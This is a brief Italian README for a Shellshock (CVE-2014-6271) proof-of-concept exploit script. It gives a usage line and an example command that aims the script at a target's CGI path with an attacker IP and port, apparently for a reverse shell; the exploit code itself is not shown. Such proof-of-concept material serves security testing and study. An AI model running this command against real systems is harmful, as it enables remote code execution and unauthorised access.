
Prova di concetto per abusare della vulnerabilità Shellshock (CVE-2014-6271).
Questo exploit sfrutta la vulnerabilità Shellshock (CVE-2014-6271) presente in bash dalla versione 1.14 alla 4.3.
python3 ./exploit.py -t <target-ip:str> -u <uri:str> -a <attacker-ip:str> -p <port:int>
Esempio:
python3 ./exploit.py -t 10.10.10.15 -u /cgi-bin/vulnerable -a 10.10.10.7 -p 4443
Maggiori informazioni sulla vulnerabilità:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-6271